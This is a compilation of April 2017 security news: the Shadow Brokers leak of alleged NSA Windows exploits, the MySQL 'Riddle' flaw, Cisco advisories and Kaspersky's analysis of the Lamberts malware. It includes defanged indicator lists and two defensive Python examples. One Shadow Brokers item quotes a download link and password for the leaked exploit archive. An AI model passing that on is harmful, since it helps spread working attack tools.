hXXp://******an[.]jp/_module/menu/menug/index.php
hXXp://******etop.co[.]jp/includes/firebug/index.php
hXXp://******etop.co[.]jp/phpmyadmin/themes/pmahomme/sprites.html
hXXp://******usai[.]com/ex-engine/modules/comment/queries/deleteComment.php
hXXp://******1cs[.]net/zy/images/patterns/preview/deleteComments.php
hXXp://******1cs[.]net/zy/images/colorpicker/s.php
Filename (over 50MB size):
srvhost.exe
propsyse.exe
perfcore.exe
oldb32.exe
oledb32.exe
javaup.exe
According to hackers, the NSA broke into the SWIFT banking system
15.4.2017 Novinky/Bezpečnost BigBrother
The hacker group called Shadow Brokers published documents on Friday raising suspicions that the US National Security Agency (NSA) managed to penetrate the SWIFT banking network, which is used for international transfers. News agencies reported this on Saturday.
Many experts consider the leaked data credible, even though the companies and institutions concerned denied it or declined to comment, the BBC said on its website under the headline "US government 'hacked global banking system'". The NSA did not comment.
The NSA, through a top-secret unit of computer hackers, reportedly monitored mainly Middle Eastern banks for possible terrorist transactions, and allegedly exploited weaknesses in Microsoft products used in computers around the world, the AFP agency reported.
SWIFT (Society for Worldwide Interbank Financial Telecommunication) serves mainly for international payments. It is a computer-controlled system for remote data transfer between banks and other financial and non-financial institutions. Within SWIFT, every participating bank has its own unique identifying code, the BIC. Source: Wikipedia
"We have seen no signs of unauthorized access to our network or our messaging service," said SWIFT, which is headquartered in Belgium. The BBC recalled that hackers successfully attacked the system last year, when criminals stole 81 million dollars (about two billion CZK) from the Bangladeshi central bank.
Weaknesses worth fifty million
The Dubai office of EastNets, which handles transfers for Middle Eastern banks, denied the report of its alleged compromise as "completely false and unfounded".
Microsoft, in a blog post by its security manager Phillip Misner, assured its customers that they are safe if they keep their software properly updated. The software giant has already developed defenses for nine of the 12 tools mentioned by the hackers; the remaining three concern outdated and unsupported products.
According to the BBC, the "security weaknesses" in question could fetch more than two million dollars (about 50 million CZK) on the black market.
Edward Snowden (@Snowden), 12:54 AM - 15 Apr 2017: "The Mother Of All Exploits escaped from an NSA laboratory and is wrecking the internet." https://motherboard.vice.com/en_us/article/your-governments-hacking-tools-are-not-safe
Linked article: "Your Government's Hacking Tools Are Not Safe" (motherboard.vice.com): From Cellebrite, to Shadow Brokers, to the CIA dump, so many recent data breaches have shown there is a real risk of exposure of government hacking tools.
If these revelations are true, according to the BBC they are the most serious since former US intelligence contractor Edward Snowden revealed the extent of global surveillance in 2013. On his Twitter account Snowden described the NSA's act as the "mother of all exploits", i.e. the mother of all exploitations of security holes, a clear reference to Thursday's dropping on Afghanistan of the most powerful US non-nuclear bomb, nicknamed the mother of all bombs.
A fifth of social network users have never changed their account password
15.4.2017 Novinky/Bezpečnost Sociální sítě
A fifth of social network users have never changed the password to their account. More than half of people have not done so in the past year, according to a survey by Thycotic. They are thus needlessly exposing their Facebook, Twitter or LinkedIn profiles to attacks.
Passwords are among the most vulnerable points of online communication. If a password is not strong enough, or the user does not change it regularly, they risk considerable problems. "As we know, social networks contain a lot of private information. When users do not regularly change the passwords to their Facebook, Twitter or LinkedIn accounts, they make it easier for hackers to access confidential information, including the possibility of breaking into their work computers and e-mail," says Joseph Carson, head of the security analyst team at Thycotic.
The company's survey found that 53 percent of users had not changed their social network passwords in the past year. More than a quarter of respondents admitted that they change their passwords at work only when the corporate system automatically prompts them to. Such prompts are entirely absent on social networks. "Social network operators should offer the option of alerts about the age and strength of a password, or about best practices for creating a strong one," says Joseph Carson.
IT professionals fail too
A casual attitude to passwords was also admitted in the survey by professionals working in IT security. Almost 30 percent of them use their date of birth, their address or their pet's name as a password. "The fact that people who deal with corporate IT security day in and day out use weak passwords is shocking and unacceptable," criticizes Thycotic CEO James Legg. "The survey clearly shows how vulnerable many people are, endangering themselves or the company they work for through their irresponsible approach to passwords."
Creating a secure and strong password is not complicated. "It should contain at least eight characters and mix upper- and lower-case letters, digits and other characters," explains Miroslav Dvořák, technical director at ESET. In his words, it is important to use a unique password for every online account. "It is true that the number of services for which we need a password keeps growing and it is hard to remember them all. That is why it is good to use a password manager, which is a standard part of quality security software," adds Dvořák.
Last year alone, three billion passwords were stolen worldwide, which means hackers stole 95 passwords every second. The number of passwords used by companies and users will continue to grow. By 2020, according to Thycotic, there will be more than 300 passwords per company, and every employee responsible for corporate IT security will be responsible for managing 90 passwords.
Turns Out Microsoft Has Already Patched Exploits Leaked By Shadow Brokers
15.4.2017 thehackernews Vulnerebility
The latest dump of hacking tools, allegedly belonging to the NSA, is believed to be the most damaging release by the Shadow Brokers to date.
But after analyzing the disclosed exploits, Microsoft's security team says most of the Windows vulnerabilities exploited by these hacking tools, including EternalBlue, EternalChampion, EternalSynergy, EternalRomance and others, were already patched in last month's Patch Tuesday update.
"Most of the exploits that were disclosed fall into vulnerabilities that are already patched in our supported products. Customers still running prior versions of these products are encouraged to upgrade to a supported offering," Microsoft Security Team said in a blog post published today.
On Good Friday, the Shadow Brokers released a massive trove of Windows hacking tools, allegedly stolen from the NSA, that work against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and their server-side variants such as Server 2000, 2003, 2008, 2008 R2 and 2012, but not Windows 10 or Windows Server 2016.
The exploits could give nearly anyone with technical knowledge the ability to break into millions of Windows computers and servers across the Internet, but only those which are not up to date.
"Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk." Microsoft says.
The data dump also includes some top-secret presentations and Excel sheets, indicating that the leaked exploits may have been used to hack the SWIFT banking systems of several banks around the world.
A hacking tool called EternalRomance has an easy-to-use interface and exploits Windows systems over TCP ports 445 and 139.
The most noteworthy exploit in Friday's dump is EternalBlue, an SMBv1 (Server Message Block 1.0) exploit that could cause older versions of Windows to execute code remotely.
Matthew Hickey, a security expert and co-founder of Hacker House, also published a video demonstration using this exploit against a computer running Windows Server 2008 R2 SP1, pulling off the hack in less than two minutes together with FuzzBunch, another alleged zero-day tool, which he used to compromise a virtual machine running Windows Server 2008.
But if the company already patched this flaw last month, how could the exploit work against an updated machine? It seems the researcher tried the exploit against a Windows PC without the latest updates installed.
"The patches were released in last month's update, I tested on a fully patched Windows 2008 R2 SP1 (x64), so many hosts will be vulnerable - if you apply MS17-010 it should protect hosts against the attacks," Matthew clarifies during a conversation with The Hacker News.
No Acknowledgement for SMB RCE Issue by Microsoft
There's also news floating around the Internet that the "NSA has had, at a minimum, 96 days of warning," knowing that the Shadow Brokers could drop the files at any time, but the agency did not report the flaws to Microsoft.
The Intercept also reported that Microsoft told it that the company had not been contacted by any "individual or organization," in relation to the hacking tools and exploits released by the Shadow Brokers.
The vulnerabilities have already been patched by Microsoft, which acknowledges all security researchers who report issues in its products, but, interestingly, there are no acknowledgments for MS17-010, which patched most of the critical flaws from the Shadow Brokers dump.
This suggests that someone from the agency, or linked to a defense contractor, may have warned the company about the SMB RCE issue.
So only those still using Windows XP, which Microsoft no longer supports, are at risk of having their machines hacked.
And there is no need to panic if you use an updated Windows 7, 8 or 10 (or even Windows Vista, whose support ended just last week; the issue was patched last month).
The simple advice is to always keep your Windows machines and servers up to date in order to avoid being hacked.
Watch out, the Riddle vulnerability affects some Oracle MySQL versions. Update them now
15.4.2017 securityaffairs Vulnerebility
A bug dubbed the Riddle vulnerability, affecting MySQL 5.5 and 5.6 clients, exposes user credentials to MiTM attacks. Update to version 5.7.
A coding error dubbed The Riddle has been uncovered in the popular DBMS Oracle MySQL; the issue can potentially be exploited by an attacker running a man-in-the-middle attack to steal usernames and passwords.
“The Riddle is a critical security vulnerability found in Oracle’s MySQL 5.5 and 5.6 client database libraries. The vulnerability allows an attacker to use riddle in the middle for breaking SSL configured connection between MySQL client and server,” states the description of the flaw. “This vulnerability is a very critical security hole because it affects MySQL — a very popular SQL database — and SSL connection which is by its definition secure.”
The flaw, tracked as CVE-2017-3305, potentially exposes login credentials to eavesdropping: an attacker can capture them when MySQL 5.5 and 5.6 clients send them to servers.
A security update released for versions 5.5.49 and 5.6.30 failed to completely fix the bug. The experts noted that versions 5.7 and later, as well as MariaDB systems, are not affected by this issue.
According to security researcher Pali Rohár, the Riddle vulnerability results from the failed attempt to patch the BACKRONYM vulnerability affecting the MySQL database. The BACKRONYM vulnerability exposes passwords to attackers who are in a position to run a man-in-the-middle attack, even if the traffic is encrypted.
“Security update for the stable MySQL 5.5.49 and 5.6.30 versions consisted of adding a verification of security parameters after the authentication process was finished.” “Since it is done after the authentication, riddle in the middle attack together with SSL-downgrade attack can be used by the attacker to steal login data for immediate authentication and log into the MySQL server,” wrote Rohár.
“Ridiculous part is that MySQL client doesn’t report any SSL-related error when MySQL server declines to authenticate a user and instead reports unencrypted error message sent by the server. Furthermore, the error message is controlled by the attacker, when the riddle in the middle attack is active.”
The expert suggests updating the client software to MySQL 5.7 or MariaDB, because their security updates work correctly.
The Riddle vulnerability was discovered in February, but today the bug still affects the Oracle MySQL software.
“Reporting bugs to Oracle is useless (even those which are security related) if you are not an Oracle customer. They can perfectly ignore any reports and they would be very happy if nobody knew about it so they don’t have to fix the bugs,” explains Rohár.
“It looks like immediate public disclosure is the best responsible solution for the users, as it is the only way to protect them and let them know immediately what should be done if they are affected.”
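The essence of Rohár's finding is an ordering bug: the client verifies its SSL parameters only after authentication has completed, so the credentials have already left the client by the time the check can fail, and any error text the client shows comes unencrypted from whoever is on the path. The Python simulation below is an added example for this page, not MySQL's or MariaDB's code; only the `CLIENT_SSL` capability bit value is the real protocol constant, everything else (the greeting model, the `Wire` recorder, the two client variants and the sample credentials) is constructed to show where the check has to sit.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Tuple

CLIENT_SSL = 0x0800            # real MySQL capability flag: "can switch to SSL"
CLIENT_LONG_PASSWORD = 0x0001  # real flag, used here only so the greeting has a second bit


class SSLError(Exception):
    """Raised by the client when its SSL policy is violated."""


class ServerError(Exception):
    """An error packet as received from the peer, which on a hijacked path is the attacker."""


@dataclass
class Greeting:
    """Model of the server's initial handshake: only the capability bits matter here."""
    capabilities: int


@dataclass
class Wire:
    """Records every credential transmission as (channel, user, password)."""
    sent: List[Tuple[str, str, str]] = field(default_factory=list)


def honest_server() -> Greeting:
    return Greeting(CLIENT_SSL | CLIENT_LONG_PASSWORD)


def downgrade_in_the_middle(g: Greeting) -> Greeting:
    """An on-path party rewrites the greeting so the client believes SSL is unavailable."""
    return Greeting(g.capabilities & ~CLIENT_SSL)


def vulnerable_login(g: Greeting, wire: Wire, user: str, password: str, server_reply: str) -> str:
    """Check-after-authentication order, as the article describes for 5.5.49 / 5.6.30 (modelled)."""
    channel = "tls" if g.capabilities & CLIENT_SSL else "cleartext"
    wire.sent.append((channel, user, password))       # credentials leave before any check
    if server_reply != "OK":
        raise ServerError(server_reply)                # peer-supplied text is surfaced as-is
    if channel != "tls":
        raise SSLError("SSL required but the connection is unencrypted")  # too late to matter
    return "authenticated"


def hardened_login(g: Greeting, wire: Wire, user: str, password: str, server_reply: str) -> str:
    """Check-before-authentication order: nothing secret is sent unless the SSL policy holds."""
    if not g.capabilities & CLIENT_SSL:
        raise SSLError("server does not advertise SSL; refusing to send credentials")
    wire.sent.append(("tls", user, password))
    if server_reply != "OK":
        raise ServerError(server_reply)
    return "authenticated"


Client = Callable[[Greeting, Wire, str, str, str], str]


def run(client: Client, greeting: Greeting, server_reply: str = "OK") -> Tuple[str, bool]:
    """Drive one login attempt; return (outcome, credentials_seen_in_cleartext)."""
    wire = Wire()
    try:
        outcome = client(greeting, wire, "app", "s3cret", server_reply)   # constructed credentials
    except SSLError as e:
        outcome = f"ssl-error: {e}"
    except ServerError as e:
        outcome = f"server-error: {e}"
    leaked = any(ch == "cleartext" for ch, _, _ in wire.sent)
    return outcome, leaked


if __name__ == "__main__":
    downgraded = downgrade_in_the_middle(honest_server())
    for name, client in (("vulnerable", vulnerable_login), ("hardened", hardened_login)):
        print(name, "vs honest server:    ", run(client, honest_server()))
        print(name, "vs downgraded, error:", run(client, downgraded, "Access denied (text chosen by the peer)"))
        print(name, "vs downgraded, OK:   ", run(client, downgraded))
```

Against an honest server both clients behave identically, which is why the bug survived a release: the difference only appears once the greeting has been tampered with, and then the vulnerable client either shows the attacker's error text or a late SSL error, in both cases after the password has crossed the wire in the clear.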
Facebook Disrupts Suspected Spam Operation
15.4.2017 securityweek Social
Facebook on Friday said it disrupted an international fake account operation that was firing off inauthentic "likes" and bogus comments to win friends it would then pound with spam.
Facebook's security team spent six months fighting to neutralize what they saw as a coordinated campaign, according to Shabnam Shaik, a company security manager.
"Our systems were able to identify a large portion of this illegitimate activity -- and to remove a substantial number of inauthentic likes," Shaik said in a blog post.
"By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people."
The ring used accounts in a number of countries including Bangladesh, Indonesia and Saudi Arabia.
The group tried to mask its activities with tactics like connecting with the social network through "proxy" servers to disguise where "likes," posts or other communications were originating, according to Shaik.
Facebook said the campaign aimed to trick people into connecting as friends they would later target with spam. The company said it had derailed the operation early enough to spare users that fate.
The leading social network this week said it has started weeding out bogus accounts by watching for suspicious behavior such as repetitive posts or torrents of messages.
The security improvement was described as being part of a broader effort to rid the leading social network of hoaxes, misinformation and fake news by verifying people's identities.
"We've found that when people represent themselves on Facebook the same way they do in real life, they act responsibly," Shaik said.
"Fake accounts don't follow this pattern, and are closely related to the creation and spread of spam."
Under pressure to stymie the spread of fake news, Facebook has taken a series of steps including making it easier to report such posts and harder to earn money from them.
Veteran Industrial Cybersecurity Firm PAS Raises $40 Million
15.4.2017 securityweek Cyber
With deep roots in software solutions for process safety and asset reliability for industrial firms, Houston, TX-based PAS announced this week that it has taken a $40 million investment that will be used to fuel its industrial control system (ICS) cybersecurity business.
While many new startups have emerged in the industrial cybersecurity space in recent years, PAS has been around for 23 years and says its solutions are deployed in more than 1,100 facilities globally in more than 70 countries.
Previously known as Plant Automation Services, Inc. (“PAS”), the company has reorganized under the new corporate name PAS Global, and will use the investment to expand its security solutions portfolio and support global growth.
Founded by Eddie Habibi, who currently serves as CEO, the company had not taken any outside funding before.
“PAS has a 23-year tradition of making industrial process facilities safer and more reliable,” Habibi said in a statement. “Our deep expertise in control systems and production-centric approach to securing ICS give us a formidable competitive advantage.”
The company helps customers comply with regulatory standards including NERC CIP, NIST, and IEC 62443, with offerings including ICS cybersecurity, automation asset management, IPL assurance, alarm management, high performance HMI, boundary management, and control loop performance optimization.
“This funding round will expand PAS sales and marketing across its global offices as well as increase research and development for Cyber Integrity, its flagship cybersecurity software product,” the company said. “Cyber Integrity protects critical infrastructure from risks associated with rising industrial internet of things (IoT) adoption, malicious cyber attacks, and insider threats.”
The $40 million growth investment came from investment firm Tinicum, a private investment partnership focused on late stage investments in manufacturing, energy, technology, media, and infrastructure.
Shadows Brokers released another archive that suggests NSA compromised a SWIFT system
15.4.2017 securityaffairs BigBrothers
The Shadow Brokers group released a 117.9 MB encrypted dump containing documents that suggest the NSA hacked a SWIFT system in the Middle East.
Last week, the notorious Shadow Brokers hacker group, which claims to have stolen hacking tools and exploits from the NSA, leaked the password for an encrypted cache of Unix hacking tools and exploits, including a remote root zero-day exploit for Solaris OS and the TOAST framework.
Today the Shadow Brokers group released another piece of the precious archive allegedly stolen from the NSA: a 117.9 MB encrypted dump containing three folders named Windows, Swift and OddJob, with 23 new hacking tools.
Some of the codenames for the hacking tools in the archive are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.
The tools and exploits released today were specifically designed to target earlier versions of the Windows operating system; this last batch of documents suggests the NSA was targeting the SWIFT banking systems of several banks around the world.
The hackers published a blog post titled “Lost in Translation,” which included a link to the archive and the password.
“Follow the links for new dumps. Windows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.
https://yadi.sk/d/NJqzpqo_3GxZA4
Password = Reeeeeeeeeeeeeee
” reads the blog post.
The overall archive is now available on GitHub, including this last portion.
Of course, security researchers immediately started digging into the precious trove of files.
x0rz (@x0rz), 11:44 AM - 14 Apr 2017: "Windows exploits, payloads and implants of #EquationGroup dumped by the #ShadowBrokers: confirmed."
Hacker Fantastic (@hackerfantastic), 3:04 PM - 14 Apr 2017: "EMERALDTHREAD is an exploit (unpatched?) for Windows XP to Windows 2003 SP2."
The hacking tools in the Windows folder work against older versions of Windows (Windows XP) and Server 2003.
The OddJob folder contains a Windows implant along with alleged configuration files and payloads; here too the targeted versions are older ones, from Windows Server 2003 Enterprise down to Windows XP Professional.
According to security expert Kevin Beaumont, who analyzed the dump, some of the Windows exploits had previously evaded detection.
Kevin Beaumont (@GossiTheDog), 12:45 - 14 Apr 2017: "So far the first 3 exploits in Windows/Exploits haven't been on VirusTotal before, nor in Palo-Alto Autofocus."
But the SWIFT folder contains a PowerPoint document that could reveal a disconcerting reality: the PPT contains credentials and data on the internal architecture of EastNets, one of the largest SWIFT Service Bureaus in the Middle East.
The folder also includes SQL scripts that could be used to query an Oracle Database for a wide range of information, including the list of users and the SWIFT message queries.
The folder also contains Excel files indicating that the NSA-linked Equation Group had hacked many banks worldwide, most of them in Middle Eastern countries (UAE, Kuwait, Qatar, Palestine and Yemen).
Matt Suiche (@msuiche), 17:48 - 14 Apr 2017: "SWIFT Host of Palestinian Bank was running Windows 2008 R2 vulnerable to exploit framework FUZZBUNCH. #ShadowBrokers cc @hackerfantastic"
But EastNets’ CEO has denied that NSA hackers ever compromised the company's systems.
“The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network is totally false and unfounded,” EastNets’ CEO Hazem Mulhim told Motherboard in an email. “The EastNets Network internal Security Unit has run a complete check of its servers and found no hacker compromise or any vulnerabilities,” reads the official statement issued by the company.
“The EastNets Service Bureau runs on a separate secure network that cannot be accessed over the public networks. The photos shown on twitter, claiming compromised information, is about pages that are outdated and obsolete, generated on a low-level internal server that is retired since 2013.”
“While we cannot ascertain the information that has been published, we can confirm that no EastNets customer data has been compromised in any way”
Cisco warns of two critical issues in IOS and Apache Struts
14.4.2017 securityaffairs Vulnerebility
Cisco issued two “critical” security advisories, one for Cisco IOS and Cisco IOS XE Software, another for a flaw affecting Apache Struts 2.
Today Cisco issued two “critical” security advisories, the first one for Cisco IOS and Cisco IOS XE Software, the second one for the recently discovered flaw affecting Apache Struts 2.
The vulnerability in Cisco IOS affects the Cisco Cluster Management Protocol (CMP) and could be exploited by an unauthenticated, remote attacker to trigger a DoS condition via a reload of the device, or to remotely execute code with elevated privileges.
“A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.” reads the Cisco Security Advisory.
According to Cisco, a wide range of devices is affected by the flaw, including the Cisco Catalyst 2350-48TD-S Switch and the Cisco SM-X Layer 2/3 EtherSwitch Service Module.
“The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and the incorrect processing of malformed CMP-specific Telnet options.” states Cisco.
An attacker can exploit the vulnerability by establishing a Telnet session with a vulnerable device and sending malformed CMP-specific Telnet options. At the time I was writing, there is no workaround to temporarily fix the problem.
“An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device,” continues the advisory.
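Cisco's advisory names two defects: cluster-internal Telnet options accepted from any peer, and malformed options mishandled. As an added example (not Cisco's code; the advisory publishes no option numbers, so CMP_OPTION below is a placeholder value), the following Python shows an RFC 855 option parser that admits the cluster-internal option only when the peer is a known cluster member, and that stops on truncated or malformed subnegotiations instead of processing them:

```python
# Added example: Telnet (RFC 854/855) option parsing with a per-peer allowlist and
# strict handling of malformed subnegotiations. Not Cisco's code; CMP_OPTION is a
# placeholder value, since the advisory does not publish the real CMP option numbers.

IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254
NEGOTIATION = {WILL, WONT, DO, DONT}

# Options any Telnet client may negotiate: ECHO, SUPPRESS-GO-AHEAD, TERMINAL-TYPE, NAWS.
PUBLIC_OPTIONS = {1, 3, 24, 31}
# Hypothetical option number standing in for the cluster-internal CMP options.
CMP_OPTION = 0xC8

MAX_SUBNEG = 64  # upper bound on subnegotiation payload we are willing to buffer


def allowed_options(peer_is_cluster_member):
    """Cluster-internal options are only admitted from a peer known to be a cluster member."""
    opts = set(PUBLIC_OPTIONS)
    if peer_is_cluster_member:
        opts.add(CMP_OPTION)
    return opts


def parse_telnet(stream, peer_is_cluster_member=False):
    """Split a Telnet byte stream into user data and option events.

    Returns (data, events). Each event is (kind, option, detail) with kind one of
    'negotiate', 'subneg', 'command', 'rejected', 'malformed', 'truncated'. Anything
    malformed or truncated stops parsing; nothing after it is acted upon.
    """
    allowed = allowed_options(peer_is_cluster_member)
    data, events = bytearray(), []
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            data.append(stream[i])
            i += 1
            continue
        if i + 1 >= n:
            events.append(("truncated", None, "IAC at end of stream"))
            break
        cmd = stream[i + 1]
        if cmd == IAC:                      # escaped 0xFF data byte
            data.append(IAC)
            i += 2
        elif cmd in NEGOTIATION:            # IAC WILL/WONT/DO/DONT <option>
            if i + 2 >= n:
                events.append(("truncated", None, "negotiation missing option byte"))
                break
            opt = stream[i + 2]
            if opt in allowed:
                events.append(("negotiate", opt, cmd))
            else:
                events.append(("rejected", opt, "option not permitted for this peer"))
            i += 3
        elif cmd == SB:                     # IAC SB <option> <payload> IAC SE
            j, payload, terminated = i + 2, bytearray(), False
            while j < n:
                if stream[j] == IAC:
                    if j + 1 >= n:
                        break               # IAC at end of stream: reported as truncated below
                    nxt = stream[j + 1]
                    if nxt == SE:
                        terminated, j = True, j + 2
                        break
                    if nxt == IAC:          # escaped 0xFF inside the payload
                        payload.append(IAC)
                        j += 2
                        continue
                    events.append(("malformed", None, "unexpected IAC command inside subnegotiation"))
                    return bytes(data), events
                payload.append(stream[j])
                j += 1
                if len(payload) > MAX_SUBNEG:
                    events.append(("malformed", None, "subnegotiation exceeds MAX_SUBNEG"))
                    return bytes(data), events
            if not terminated:
                events.append(("truncated", None, "subnegotiation without IAC SE"))
                break
            if not payload:
                events.append(("malformed", None, "empty subnegotiation"))
                return bytes(data), events
            opt = payload[0]
            if opt in allowed:
                events.append(("subneg", opt, bytes(payload[1:])))
            else:
                events.append(("rejected", opt, "subnegotiation for option not permitted"))
            i = j
        else:                               # other two-byte commands (NOP, GA, ...)
            events.append(("command", cmd, None))
            i += 2
    return bytes(data), events


# Constructed sample stream: plain text, an ordinary DO ECHO, a subnegotiation for the
# cluster-internal option, then a subnegotiation cut off before IAC SE.
SAMPLE_STREAM = (b"he" + bytes([IAC, DO, 1]) + b"llo"
                 + bytes([IAC, SB, CMP_OPTION, 0x01, 0x02, IAC, SE])
                 + bytes([IAC, SB, 24]))

if __name__ == "__main__":
    for member in (False, True):
        data, events = parse_telnet(SAMPLE_STREAM, peer_is_cluster_member=member)
        print("cluster member" if member else "external peer", data, events)
```

Run against the constructed stream, an external peer sees the CMP subnegotiation rejected and the trailing cut-off subnegotiation reported as truncated, while a cluster member gets the same payload delivered as a 'subneg' event; the allowlist decision is made per peer, which is the restriction the advisory says was missing.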
As for the flaw in Apache Struts2, Cisco confirmed that some products using the application could be remotely hacked. The remote code execution flaw disclosed by Apache in March, tracked as CVE-2017-5638, affects the Jakarta-based file upload Multipart parser.
The IT giant is still investigating which of its products are affected; so far the company has confirmed that Cisco SocialMiner, Identity Services Engine (ISE), Prime License Manager and others are affected.
Unraveling the Lamberts Toolkit
14.4.2017 Kaspersky Attack
Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.
Longhorn, which we internally refer to as “The Lamberts”, first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability (CVE-2014-4148). The attack leveraged malware we called ‘BlackLambert’, which was used to target a high profile organization in Europe.
Since at least 2008, The Lamberts have used multiple sophisticated attack tools against high-profile victims. Their arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools, and wipers. Versions for both Windows and OSX are known at this time, with the latest samples created in 2016.
Although the operational security displayed by actors using the Lamberts toolkit is very good, one sample includes a PDB path that points to a project named “Archan~1” (perhaps ‘Archangel’). The root folder on the PDB path is named “Hudson”. This is one of the very few mistakes we’ve seen with this threat actor.
While in most cases the infection vector remains unknown, the high profile attack from 2014 used a very complex Windows TTF zero-day exploit (CVE-2014-4148).
Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family. For more information please contact: intelreports@kaspersky.com
Figure 1. Lamberts discovery timeline
The first time the Lambert family malware was uncovered publicly was in October 2014, when FireEye posted a blog about a zero day exploit (CVE-2014-4148) used in the wild. The vulnerability was patched by Microsoft at the same time. We named the malware involved ‘Black Lambert’ and described it thoroughly in a private report, available to Kaspersky APT Intel Reports subscribers.
The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.
                  Black Lambert    White Lambert
Implant type      Active           Passive
toolType          wl               aa (“ArchAngel”)
build             132914           113140
versionName       2.0.0            5.0.2
Internal configuration similarities in Black and White Lambert
White Lambert runs in kernel mode and intercepts network traffic on infected machines. It decrypts packets crafted in a special format to extract instructions. We named these passive backdoors ‘White Lambert’ to contrast with the active “Black Lambert” implants.
Looking further for any other malware related to White Lambert and Black Lambert, we came by another generation of malware that we called Blue Lambert.
One of the Blue Lambert samples is interesting because it appears to have been used as second stage malware in a high profile attack, which involved the Black Lambert malware.
Looking further for malware similar to Blue Lambert, we came by another family of malware we called Green Lambert. Green Lambert is a lighter, more reliable, but older version of Blue Lambert. Interestingly, while most Blue Lambert variants have version numbers in the range of 2.x, Green Lambert is mostly in 3.x versions. This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant. Perhaps both Blue and Green Lamberts have been developed in parallel by two different teams working under the same umbrella, as normal software version iterations, with one seeing earlier deployment than the other.
Signatures created for Green Lambert (Windows) have also triggered on an OS X variant of Green Lambert with a very low version number, 1.2.0, which was uploaded to a multiscanner service in September 2014. The OS X variant of Green Lambert is in many regards functionally identical to the Windows version, but it lacks certain functionality such as running plugins directly in memory.
Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family Pink Lambert.
The Pink Lambert toolset includes a beaconing implant, a USB-harvesting module and a multi-platform orchestrator framework which can be used to create OS-independent malware. Versions of this particular orchestrator were found on other victims, together with White Lambert samples, indicating a close relationship between the White and Pink Lambert malware families.
By looking further for other undetected malware on victims of White Lambert, we found yet another apparently related family. The new family, which we called Gray Lambert, is the latest iteration of the passive network tools from the Lamberts’ arsenal. The coding style of Gray Lambert is similar to that of the Pink Lambert USB-harvesting module, while its functionality mirrors that of White Lambert. Compared to White Lambert, Gray Lambert runs in user mode, without needing to exploit a vulnerable signed driver to load arbitrary code on 64-bit Windows.
Connecting all these different families by shared code, data formats, C&C servers, and victims, we have arrived at the following overarching picture:
Figure 2. An overview of connections between the Lambert families
The Lamberts in Brief – from Black to Gray
Below, we provide a small summary of all the Lamberts. A full description of all variants is available to subscribers of Kaspersky APT Reports. Contact intelreports@kaspersky.com
Black Lambert
The only known sample of Black Lambert was dropped by a TTF-exploit zero day (CVE-2014-4148). Its internal configuration included a proxy server which suggests the malware was created to work in a very specific network configuration, inside the victim’s network.
An internal description of Black Lambert indicates what appears to be a set of markers used by the attackers to denote this particular branch: toolType=wl, build=132914, versionName = 2.0.0.
Hash                               Description
683afdef710bf3c96d42e6d9e7275130   generic loader (hdmsvc.exe)
79e263f78e69110c09642bbb30f09ace   winlib.dll, final payload (toolType=wl)
Blue Lambert
The Blue Lambert implants contain what appear to be version numbers in the 2.x range, together with project/operation codename sets, which may also indicate codenames for the victims or campaigns.
Figure 4. Blue Lambert configuration in decrypted form, highlighting internal codenames
Known codenames include TRUE CRIME (2.2.0.2), CERVELO YARDBIRD (2.6.1.1), GAI SHU (2.2.0.5), DOUBLESIDED SCOOBYSNACK (2.3.0.2), FUNNELCAKE CARNIVAL (2.5.0.2), PROSPER SPOCK (2.0.0.2), RINGTOSS CARNIVAL (2.4.2.2), COD FISH (2.2.0.0), and INVERTED SHOT (2.6.2.3).
Green Lambert
Green Lambert is a family of tools deeply related to Blue Lambert. The functionality is very similar, both Blue and Green are active implants. The configuration data shares the same style of codenames for victims, operations, or projects.
Figure 5. Green Lambert configuration block (decrypted) highlighting internal codenames
The Green Lambert family is the only one where non-Windows variants have been found. An old version of Green Lambert, compiled for OS X, was uploaded from Russia to a multiscanner service in 2014. Its internal codename is HO BO (1.2.0).
The Windows versions of Green Lambert have the following code names: BEARD BLUE (2.7.1), GORDON FLASH (3.0), APE ESCAPE (3.0.2), SPOCK LOGICAL (3.0.2), PIZZA ASSAULT (3.0.5), and SNOW BLOWER (3.0.5).
Interestingly, one of the droppers of Green Lambert abused an ICS software package named “Subway Environmental Simulation Program” or “SES”, which has been available on certain forums visited by engineers working with industrial software. Similar techniques have been observed in the past from other threat groups, for instance, trojanized Oracle installers by the Equation group.
White Lambert
